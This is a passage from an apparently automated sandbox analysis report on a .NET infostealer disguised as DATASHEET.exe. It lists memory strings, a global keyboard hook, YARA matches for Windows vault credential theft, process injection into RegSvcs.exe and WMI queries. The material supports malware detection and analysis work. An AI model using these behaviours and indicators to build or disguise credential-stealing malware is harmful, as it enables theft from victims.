http://ocsp.globalsign.com/rootr103
                    Source: RegSvcs.exe, 0000000D.00000002.4178842499.0000000007FAA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.0000000003593000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4177256601.0000000007EC4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000033E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4176959760.0000000007EB0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.0000000003688000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4178605679.0000000007F62000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4177916409.0000000007EE9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4178238907.0000000007F56000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000037B8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4168134904.0000000006690000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4155316760.000000000149A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4168255024.0000000006696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                    Source: DATASHEET.exe, 00000000.00000002.1779039940.0000000002D15000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1805867621.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, jwvzGqkYNEejno.exe, 00000009.00000002.1824252057.00000000028E5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000032DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: RegSvcs.exe, 0000000D.00000002.4178842499.0000000007FAA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.0000000003593000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4177256601.0000000007EC4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.000000000331B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4168134904.000000000667F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000033E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.000000000338E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4176959760.0000000007EB0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.0000000003688000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4154589604.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000037B8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4178605679.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4155316760.000000000149A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4154589604.0000000001433000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4178196919.0000000007F15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsrsaovsslca2018.crt07
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: DATASHEET.exe, 00000000.00000002.1781481952.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1800322328.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: DATASHEET.exe, 00000000.00000002.1781481952.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1800322328.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1805867621.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000032DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: RegSvcs.exe, 00000008.00000002.1805867621.0000000002F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: RegSvcs.exe, 00000008.00000002.1805867621.0000000002F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: RegSvcs.exe, 0000000D.00000002.4168255024.0000000006696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.
                    Source: RegSvcs.exe, 0000000D.00000002.4178842499.0000000007FAA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.0000000003593000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4177256601.0000000007EC4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.000000000331B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4168134904.000000000667F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4167415664.00000000065E0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000033E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4177916409.0000000007EF9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.000000000338E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4176959760.0000000007EB0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.0000000003688000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4178238907.0000000007F32000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4154589604.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4178605679.0000000007F62000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4177916409.0000000007EE9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4178238907.0000000007F56000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000037B8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4178238907.0000000007F19000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4168134904.0000000006690000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4178605679.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4155316760.000000000149A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49737 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.DATASHEET.exe.3d32700.2.raw.unpack, 7KG.cs.Net Code: _2s8
                    Source: 0.2.DATASHEET.exe.3d6d320.3.raw.unpack, 7KG.cs.Net Code: _2s8
                    Installs a global keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.DATASHEET.exe.3d32700.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.DATASHEET.exe.3d6d320.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.DATASHEET.exe.3d6d320.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.DATASHEET.exe.3d32700.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\DATASHEET.exeCode function: 0_2_02B2DF640_2_02B2DF64
                    Source: C:\Users\user\Desktop\DATASHEET.exeCode function: 0_2_05EC6DC80_2_05EC6DC8
                    Source: C:\Users\user\Desktop\DATASHEET.exeCode function: 0_2_05EC16F80_2_05EC16F8
                    Source: C:\Users\user\Desktop\DATASHEET.exeCode function: 0_2_05EC16C10_2_05EC16C1
                    Source: C:\Users\user\Desktop\DATASHEET.exeCode function: 0_2_05ECA6200_2_05ECA620
                    Source: C:\Users\user\Desktop\DATASHEET.exeCode function: 0_2_05ECA6100_2_05ECA610
                    Source: C:\Users\user\Desktop\DATASHEET.exeCode function: 0_2_05ECA1E80_2_05ECA1E8
                    Source: C:\Users\user\Desktop\DATASHEET.exeCode function: 0_2_05ECC2D00_2_05ECC2D0
                    Source: C:\Users\user\Desktop\DATASHEET.exeCode function: 0_2_05ECBDC00_2_05ECBDC0
                    Source: C:\Users\user\Desktop\DATASHEET.exeCode function: 0_2_05EC6DB90_2_05EC6DB9
                    Source: C:\Users\user\Desktop\DATASHEET.exeCode function: 0_2_05EC9DB00_2_05EC9DB0
                    Source: C:\Users\user\Desktop\DATASHEET.exeCode function: 0_2_07DB1F480_2_07DB1F48
                    Source: C:\Users\user\Desktop\DATASHEET.exeCode function: 0_2_07DB35D00_2_07DB35D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0153E4808_2_0153E480
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0153AA388_2_0153AA38
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0153DAB08_2_0153DAB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01534AB88_2_01534AB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01533EA08_2_01533EA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015341E88_2_015341E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06A956188_2_06A95618
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06A9B2A28_2_06A9B2A2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06A930D08_2_06A930D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06A97E008_2_06A97E00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06A977208_2_06A97720
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06A9E4188_2_06A9E418
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06A900408_2_06A90040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06A95D638_2_06A95D63
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06A900068_2_06A90006
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeCode function: 9_2_0281DF649_2_0281DF64
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeCode function: 9_2_06F86DC89_2_06F86DC8
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeCode function: 9_2_06F816F89_2_06F816F8
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeCode function: 9_2_06F816C19_2_06F816C1
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeCode function: 9_2_06F8A6209_2_06F8A620
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeCode function: 9_2_06F8A6109_2_06F8A610
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeCode function: 9_2_06F8C2D09_2_06F8C2D0
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeCode function: 9_2_06F8A1E89_2_06F8A1E8
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeCode function: 9_2_06F8BDC09_2_06F8BDC0
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeCode function: 9_2_06F86DB99_2_06F86DB9
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeCode function: 9_2_06F89DB09_2_06F89DB0
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeCode function: 9_2_0A550D009_2_0A550D00
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeCode function: 9_2_0A5523889_2_0A552388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016D41E813_2_016D41E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016DAA3813_2_016DAA38
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016D4AB813_2_016D4AB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016DDAB013_2_016DDAB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016D3EA013_2_016D3EA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_06D230D013_2_06D230D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_06D2772013_2_06D27720
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_06D2004013_2_06D20040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_06D2000713_2_06D20007
                    Source: DATASHEET.exe, 00000000.00000002.1781481952.0000000003F1D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs DATASHEET.exe
                    Source: DATASHEET.exe, 00000000.00000000.1689751348.00000000009A0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAezq.exeB vs DATASHEET.exe
                    Source: DATASHEET.exe, 00000000.00000002.1779039940.0000000002CA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs DATASHEET.exe
                    Source: DATASHEET.exe, 00000000.00000002.1777548800.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DATASHEET.exe
                    Source: DATASHEET.exe, 00000000.00000002.1790261331.0000000007DC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs DATASHEET.exe
                    Source: DATASHEET.exe, 00000000.00000002.1781481952.0000000003CA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed01d1e44-b654-4c6b-973f-f9dea01115c9.exe4 vs DATASHEET.exe
                    Source: DATASHEET.exe, 00000000.00000002.1779039940.0000000002D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed01d1e44-b654-4c6b-973f-f9dea01115c9.exe4 vs DATASHEET.exe
                    Source: DATASHEET.exe, 00000000.00000002.1786431420.0000000005760000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs DATASHEET.exe
                    Source: DATASHEET.exeBinary or memory string: OriginalFilenameAezq.exeB vs DATASHEET.exe
                    Source: DATASHEET.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.DATASHEET.exe.3d32700.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.DATASHEET.exe.3d6d320.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.DATASHEET.exe.3d6d320.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.DATASHEET.exe.3d32700.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: DATASHEET.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: jwvzGqkYNEejno.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.DATASHEET.exe.3d32700.2.raw.unpack, 1UT6pzc0M.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DATASHEET.exe.3d32700.2.raw.unpack, DnQOD3M.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DATASHEET.exe.3d32700.2.raw.unpack, 01seU.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.DATASHEET.exe.3d32700.2.raw.unpack, iUDwvr7Gz.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DATASHEET.exe.3d32700.2.raw.unpack, XUu2qKyuF6.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DATASHEET.exe.3d32700.2.raw.unpack, aZathEIgR.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 0.2.DATASHEET.exe.3d32700.2.raw.unpack, l50VLEll22.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DATASHEET.exe.3d32700.2.raw.unpack, l50VLEll22.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, AMPI2OQw9LBFRkO0xI.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, AMPI2OQw9LBFRkO0xI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, AMPI2OQw9LBFRkO0xI.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, AMPI2OQw9LBFRkO0xI.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, AMPI2OQw9LBFRkO0xI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, AMPI2OQw9LBFRkO0xI.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, I8scn9C6GIjEcHxArD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, I8scn9C6GIjEcHxArD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/15@3/2
                    Source: C:\Users\user\Desktop\DATASHEET.exeFile created: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeMutant created: \Sessions\1\BaseNamedObjects\fyIiVTsBeTQzqZfnDAGAyEefieZ
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5264:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
                    Source: C:\Users\user\Desktop\DATASHEET.exeFile created: C:\Users\user\AppData\Local\Temp\tmp8AFA.tmpJump to behavior
                    Source: DATASHEET.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: DATASHEET.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
